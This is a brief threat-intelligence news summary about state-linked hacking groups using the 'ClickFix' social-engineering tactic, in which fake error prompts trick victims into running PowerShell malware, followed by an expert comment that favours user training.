Threat actors from North Korea (Kimsuky), Iran (MuddyWater), and Russia (APT28, UNK_RemoteRogue) are increasingly using the “ClickFix” tactic in espionage operations. ClickFix manipulates victims into manually running malicious PowerShell commands by displaying fake error prompts on fraudulent websites. Between late 2024 and early 2025, these campaigns targeted think tanks, Middle Eastern organizations, and arms manufacturers. Attackers exploited trust through spoofed emails and decoy documents to trigger manual malware execution and establish persistent access.
Expert Analysis:
ClickFix is the latest proof that technical protections alone cannot defeat social engineering. Attackers are bypassing security tools not by force but by persuasion, exploiting human reflexes instead of system flaws. When a fake prompt can open a backdoor as effectively as a zero-day exploit, the entire defense strategy must evolve beyond reactive patches to proactive user conditioning.
Read the full article here.
